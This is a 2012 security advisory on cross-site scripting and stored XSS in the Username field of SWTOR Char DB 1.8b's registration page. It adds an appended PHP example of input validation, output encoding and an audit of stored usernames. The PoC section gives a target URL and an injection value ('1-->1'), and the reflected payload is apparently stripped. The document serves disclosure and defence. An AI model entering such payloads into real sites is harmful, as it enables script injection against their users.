Advisory: Star Wars Old Republic - SWTOR Char DB 1.8b Multiple security vulnerabilities
Advisory ID: SSCHADV2012-009
Author: Stefan Schurtz
Affected Software: Successfully tested on Star Wars Old Republic - SWTOR Char DB 1.8b
Vendor URL: http://swtorphpdb.sourceforge.net/
Vendor Status: fixed
OSVDB ID: 80841, 80842
==========================
Vulnerability Description
==========================
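SWTOR Char DB 1.8b is prone to multiple security vulnerabilities: cross-site scripting (XSS) and stored XSS through the Username field of the registration page (user/register.php).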
==================
PoC-Exploit
==================
// XSS
http://[target]/swtor/user/register.php
Username:
Password: whatever
// Stored XSS
http://[target]/swtor/user/register.php
Username: 1-->1
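
Added example, not part of the original advisory and not the vendor's fix: one way to handle the Username field of a registration page defensively, with allowlist validation on input, HTML encoding on every output, and an audit of names stored before the fix. The username policy, the function names and the sample data are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Assumed policy, not taken from the advisory: 3-32 chars of letters, digits, '_', '.', '-'.
const USERNAME_PATTERN = '/\A[A-Za-z0-9_.-]{3,32}\z/';

/** Returns the trimmed username if it matches the allowlist, otherwise null. */
function validate_username(string $raw): ?string
{
    $name = trim($raw);
    return preg_match(USERNAME_PATTERN, $name) === 1 ? $name : null;
}

/** Encodes a value for HTML element content or a quoted attribute value. */
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Re-displays the form after a rejected submission; the echoed name is encoded. */
function render_register_form(string $submitted, string $error): string
{
    return '<p class="error">' . html_escape($error) . '</p>'
        . '<form method="post" action="register.php">'
        . '<input type="text" name="username" value="' . html_escape($submitted) . '">'
        . '<input type="password" name="password">'
        . '<button type="submit">Register</button></form>';
}

/** Lists stored usernames that fail the allowlist (rows saved before the fix). */
function find_suspect_usernames(array $storedNames): array
{
    return array_values(array_filter(
        $storedNames,
        static fn(string $n): bool => validate_username($n) === null
    ));
}

// Constructed sample data; '1-->1' is the value shown in the advisory's PoC.
$stored = ['jedi_master', '1-->1', 'Darth.Revan', '<b>x</b>'];
foreach (find_suspect_usernames($stored) as $name) {
    // Encode on output as well: legacy rows may already contain markup.
    echo 'suspect stored username: ' . html_escape($name) . PHP_EOL;
}
echo render_register_form('1-->1', 'Username contains characters that are not allowed.') . PHP_EOL;
```

Upgrading to the fixed release does not clean rows that were stored earlier, so the audit function is meant to be run once over the existing user table after the upgrade.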